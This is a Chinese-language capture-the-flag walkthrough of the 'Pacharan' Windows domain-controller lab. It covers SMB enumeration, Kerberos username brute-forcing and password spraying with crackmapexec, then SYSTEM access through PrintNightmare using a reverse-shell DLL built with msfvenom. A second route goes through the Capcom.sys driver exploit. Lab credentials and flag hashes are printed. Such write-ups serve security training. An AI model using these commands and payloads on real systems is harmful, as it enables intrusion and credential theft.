2.Pacharan

1. 基本信息^toc

2. 信息收集

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# fscan -h 192.168.69.69

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| ''__/ _ |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.69.69:445 open
192.168.69.69:88 open
192.168.69.69:139 open
192.168.69.69:135 open
[*] alive ports len is: 4
start vulscan
[*] NetBios 192.168.69.69   [+] DC:PACHARAN\WIN-VRU3GG3DPLJ
[*] NetInfo
[*]192.168.69.69
   [->]WIN-VRU3GG3DPLJ
   [->]192.168.69.69
已完成 4/4
[*] 扫描结束,耗时: 1.128075052s

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# nmap -sC -sV 192.168.69.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 14:51 CST
Nmap scan report for 192.168.69.69
Host is up (0.00014s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-04 13:51:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:7A:01:8C (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m57s
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:7a:01:8c (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-12-04T13:51:20
|_  start_date: 2024-12-04T13:48:49

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.06 seconds

域名 PACHARAN.THL
配一下hsots

3. smb空会话检测

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u anonymous -H 192.168.69.69

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 192.168.69.69:445       Name: PACHARAN.THL              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Admin remota
        C$                                                      NO ACCESS       Recurso predeterminado
        IPC$                                                    READ ONLY       IPC remota
        NETLOGON                                                NO ACCESS       Recurso compartido del servidor de inicio de sesión
        NETLOGON2                                               READ ONLY
        PACHARAN                                                NO ACCESS
        PDF Pro Virtual Printer                                 NO ACCESS       Soy Hacker y arreglo impresoras
        print$                                                  NO ACCESS       Controladores de impresora
        SYSVOL                                                  NO ACCESS       Recurso compartido del servidor de inicio de sesión
        Users                                                   NO ACCESS
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbclient -U anonymous   //192.168.69.69/NETLOGON2
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  1 01:25:34 2024
  ..                                  D        0  Thu Aug  1 01:25:34 2024
  Orujo.txt                           A       22  Thu Aug  1 01:25:55 2024

                7735807 blocks of size 4096. 4713743 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)
smb: \> exit


┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat Orujo.txt
Pericodelospalotes6969   

获取到两个关键字符串
Pericodelospalotes6969
Orujo

4. Kerbrute force

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# kerbrute userenum -d PACHARAN.THL --dc 192.168.69.69 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/04/24 - Ronnie Flathers @ropnop

2024/12/04 15:01:42 >  Using KDC(s):
2024/12/04 15:01:42 >   192.168.69.69:88

2024/12/04 15:01:42 >  [+] VALID USERNAME:       chivas@PACHARAN.THL
2024/12/04 15:01:44 >  [+] VALID USERNAME:       hendrick@PACHARAN.THL
2024/12/04 15:01:44 >  [+] VALID USERNAME:       whisky@PACHARAN.THL
2024/12/04 15:01:44 >  [+] VALID USERNAME:       gordons@PACHARAN.THL
2024/12/04 15:01:46 >  [+] VALID USERNAME:       redlabel@PACHARAN.THL
2024/12/04 15:01:47 >  [+] VALID USERNAME:       beefeater@PACHARAN.THL
2024/12/04 15:01:47 >  [+] VALID USERNAME:       Chivas@PACHARAN.THL
2024/12/04 15:01:49 >  [+] VALID USERNAME:       invitado@PACHARAN.THL
2024/12/04 15:02:06 >  [+] VALID USERNAME:       administrador@PACHARAN.THL
2024/12/04 15:06:35 >  [+] VALID USERNAME:       carlosv@PACHARAN.THL
2024/12/04 15:07:19 >  [+] VALID USERNAME:       Whisky@PACHARAN.THL
2024/12/04 15:07:26 >  [+] VALID USERNAME:       RedLabel@PACHARAN.THL
2024/12/04 15:07:41 >  [+] VALID USERNAME:       GordonS@PACHARAN.THL
2024/12/04 15:07:42 >  [+] VALID USERNAME:       GINEBRA@PACHARAN.THL
2024/12/04 15:07:48 >  [+] VALID USERNAME:       CarlosV@PACHARAN.THL
2024/12/04 15:07:49 >  [+] VALID USERNAME:       CHIVAS@PACHARAN.THL
2024/12/04 15:07:50 >  [+] VALID USERNAME:       Beefeater@PACHARAN.THL
2024/12/04 15:08:03 >  Done! Tested 8295455 usernames (17 valid) in 380.478 seconds

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat kerbrute_users.txt|cut -d ' ' -f14|cut -d '@' -f1>valid_users.txt

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat valid_users.txt
chivas
hendrick
whisky
gordons
redlabel
beefeater
Chivas
invitado
administrador
carlosv
Whisky
RedLabel
GordonS
GINEBRA
CarlosV
CHIVAS
Beefeater

把上面获取到的字符串也加进去 Pericodelospalotes6969 Orujo

5. 密码喷涂

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p valid_users.txt --continue-on-success
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)

SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:chivas
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:hendrick
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:whisky
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:gordons
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:redlabel
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:beefeater
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:Chivas
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:invitado
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:administrador
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:carlosv
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:Whisky
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:RedLabel
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:GordonS
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:GINEBRA
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:CarlosV
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:CHIVAS
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:Beefeater
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:Pericodelospalotes6969
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:Orujo
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:chivas STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:hendrick STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:whisky STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:gordons STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:redlabel STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:beefeater STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:Chivas STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:invitado STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:administrador STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:carlosv STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:Whisky STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:RedLabel STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:GordonS STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:GINEBRA STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:CarlosV STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:CHIVAS STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:Beefeater STATUS_LOGON_FAILURE
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Orujo:Pericodelospalotes6969
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:Orujo STATUS_LOGON_FAILURE


可以看到 Pericodelospalotes6969 用户是不需要密码的
尝试利用 evil-winrm 登录该用户

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u Pericodelospalotes6969 -p Per

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

失败了

还有一个用户
Orujo :Pericodelospalotes6969

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u Orujo -p Pericodelospalotes6969

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

好吧也不行

6. Orujo利用

看一下Orujo用户的smb共享

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u Orujo -p Pericodelospalotes6969 -H 192.168.69.69

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 192.168.69.69:445       Name: PACHARAN.THL              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Admin remota
        C$                                                      NO ACCESS       Recurso predeterminado
        IPC$                                                    READ ONLY       IPC remota
        NETLOGON                                                READ ONLY       Recurso compartido del servidor de inicio de sesión
        NETLOGON2                                               NO ACCESS
        PACHARAN                                                READ ONLY
        PDF Pro Virtual Printer                                 NO ACCESS       Soy Hacker y arreglo impresoras
        print$                                                  NO ACCESS       Controladores de impresora
        SYSVOL                                                  NO ACCESS       Recurso compartido del servidor de inicio de sesión
        Users                                                   NO ACCESS

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbclient -U Orujo  //192.168.69.69/PACHARAN
Password for [WORKGROUP\Orujo]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  1 01:21:13 2024
  ..                                  D        0  Thu Aug  1 01:21:13 2024
  ah.txt                              A      921  Thu Aug  1 01:20:16 2024

                7735807 blocks of size 4096. 4712894 blocks available
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat ah.txt
Mamasoystreamer1!
Mamasoystreamer2@
Mamasoystreamer3#
Mamasoystreamer4$
Mamasoystreamer5%
Mamasoystreamer6^
Mamasoystreamer7&
Mamasoystreamer8*
Mamasoystreamer9(
Mamasoystreamer10)
MamasoyStreamer11!
MamasoyStreamer12@
MamasoyStreamer13#
MamasoyStreamer14$
MamasoyStreamer15%
MamasoyStreamer16^
MamasoyStreamer17&
MamasoyStreamer18*
MamasoyStreamer19(
MamasoyStreamer20)
MamaSoyStreamer1!
MamaSoyStreamer2@
MamaSoyStreamer3#
MamaSoyStreamer4$
MamaSoyStreamer5%
MamaSoyStreamer6^
MamaSoyStreamer7&
MamaSoyStreamer8*
MamaSoyStreamer9(
MamaSoyStreamer10)
MamasoyStream1er!
MamasoyStream2er@
MamasoyStream3er#
MamasoyStream4er$
MamasoyStream5er%
MamasoyStream6er^
MamasoyStream7er&
MamasoyStream8er*
MamasoyStream9er(
MamasoyStream10er)
MamasoyStr1amer!
MamasoyStr2amer@
MamasoyStr3amer#
MamasoyStr4amer$
MamasoyStr5amer%
MamasoyStr6amer^
MamasoyStr7amer&
MamasoyStr8amer*
MamasoyStr9amer(
MamasoyStr10amer)
Mamasoystreamer1

看这像是一个密码表

7. Whisky用户利用

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p ah.txt --continue-on-success |grep +
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\whisky:MamasoyStream2er@
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Whisky:MamasoyStream2er@

成功获取到了 Whisky 用户的密码
尝试evil -winrm登录


┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u 'Whisky' -p 'MamasoyStream2er@'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

又失败了

才看下 Whisky 用户的smb共享

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u Whisky -p MamasoyStream2er@ -H 192.168.69.69

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[/] Auth[!] Unable to remove test file at \\192.168.69.69\PDF Pro Virtual Printer\LBJIFVWHAS.txt, please remove manually

[+] IP: 192.168.69.69:445       Name: PACHARAN.THL              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Admin remota
        C$                                                      NO ACCESS       Recurso predeterminado
        IPC$                                                    READ ONLY       IPC remota
        NETLOGON                                                READ ONLY       Recurso compartido del servidor de inicio de sesión
        NETLOGON2                                               NO ACCESS
        PACHARAN                                                NO ACCESS
        PDF Pro Virtual Printer                                 NO ACCESS       Soy Hacker y arreglo impresoras
        print$                                                  NO ACCESS       Controladores de impresora
        SYSVOL                                                  NO ACCESS       Recurso compartido del servidor de inicio de sesión
        Users                                                   NO ACCESS

没有啥东西啊

利用 Whisky 用户的权限进行 rid-brute 收集域内用户


┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u Whisky -p MamasoyStream2er@ --rid-brute >rid-brute.txt

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# wc -l rid-brute.txt
40 rid-brute.txt

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat rid-brute.txt |grep SidTypeUser |cut -d ' ' -f21|cut -d '\' -f2 >valid_users.txt

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat valid_users.txt
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$
Orujo
Ginebra
Whisky
Hendrick
Chivas
Whisky2
JB
Chivas
beefeater
CarlosV
RedLabel
Gordons

查看打印机

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumprinters'
        flags:[0x800000]
        name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
        description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
        comment:[Soy Hacker y arreglo impresoras]

获取到一个密码 TurkisArrusPuchuchuSiu1
密码喷涂试试

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p TurkisArrusPuchuchuSiu1 --continue-on-success |grep +
SMB         PACHARAN.THL    445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1

Evil-winrm登录

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

8. CVE-2021-34527 提权到系统用户

在利用smb检测时我们看到存在一台打印机,那我们可以尝试利用相关漏洞
CVE-2021-34527 也叫 PrintNightmare漏洞

利用脚本 https://github.com/JohnHammond/CVE-2021-34527
这里只是wp 我直接讲如何做
先检查一下打印机相关的协议是否运行

┌──(kali㉿kali)-[~/thl/Pacharan]
└─$ impacket-rpcdump @192.168.69.69 | grep -E 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

很好 这两个协议都在运行

然后用msf生成一个反向dll 然后上传上去

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.69.3 lport=4455 -f dll -o reverse.dll

复制到一个windows下默认可写的目录下。具体的可以看这里https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> cp reverse.dll  C:\Windows\Tasks\reverse.dll

加载漏洞利用模块 然后执行dll 反弹shell

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/CVE-2021-34527.ps1

Info: Uploading /home/kali/thl/Pacharan/CVE-2021-34527.ps1 to C:\Users\Chivas Regal\Documents\CVE-2021-34527.ps

Data: 238084 bytes of 238084 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> ls


    Directorio: C:\Users\Chivas Regal\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        12/4/2024   3:53 PM         295936 6666.exe
-a----        12/4/2024   8:42 PM         178563 CVE-2021-34527.ps1
-a----        12/4/2024   8:26 PM           9216 reverse.dll


*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Import-Module .\CVE-2021-34527.ps1

nc -lvnp 4455

Invoke-Nightmare -DLL 'C:\Windows\Tasks\reverse.dll'

然后就可以获取到系统用户的shell了

┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# nc -lvnp 4455
listening on [any] 4455 ...
connect to [192.168.69.3] from (UNKNOWN) [192.168.69.69] 49194
Microsoft Windows [Versi▒n 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
c:\Users\Chivas Regal\Desktop>type user.txt
type user.txt
bb8b4df8eda73e75ca51ca88a909c1cb  -


c:\Users\Administrador\Desktop>type root.txt
type root.txt
cfa7cb1cc20e26c0428f9222d44c76a0  -

9. 方式2: SeLoadDriverPrivilege权限提权到系统

查看权限时可以看到我们有 SeLoadDriverPrivilege权限
该权限允许用户或进程在系统上加载和卸载设备驱动程序。
通常,只有管理员或受信任的系统进程才会被授予此权限

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv

INFORMACIàN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci¢n                                     Estado
============================= =============================================== ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio        Habilitada
SeLoadDriverPrivilege         Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido                Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso    Habilitada

然后可以从这里 获取到漏洞利用的相关工具

上传相关工具:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/ExploitCapcom.exe

Info: Uploading /home/kali/thl/Pacharan/ExploitCapcom.exe to C:\Users\Chivas Regal\Documents\ExploitCapcom.exe

Data: 387752 bytes of 387752 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/eoploaddriver_x64.exe

Info: Uploading /home/kali/thl/Pacharan/eoploaddriver_x64.exe to C:\Users\Chivas Regal\Documents\eoploaddriver_x64.exe

Data: 92840 bytes of 92840 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/Capcom.sys

Info: Uploading /home/kali/thl/Pacharan/Capcom.sys to C:\Users\Chivas Regal\Documents\Capcom.sys

Data: 14100 bytes of 14100 bytes copied

Info: Upload successful!


加载恶意驱动程序:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> .\ExploitCapcom.exe LOAD c:\windows\tasks\Capcom.sys
[*] Service Name: drlynhqu
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0


漏洞利用 特权用户执行命令
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> .\ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 00000239224D0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system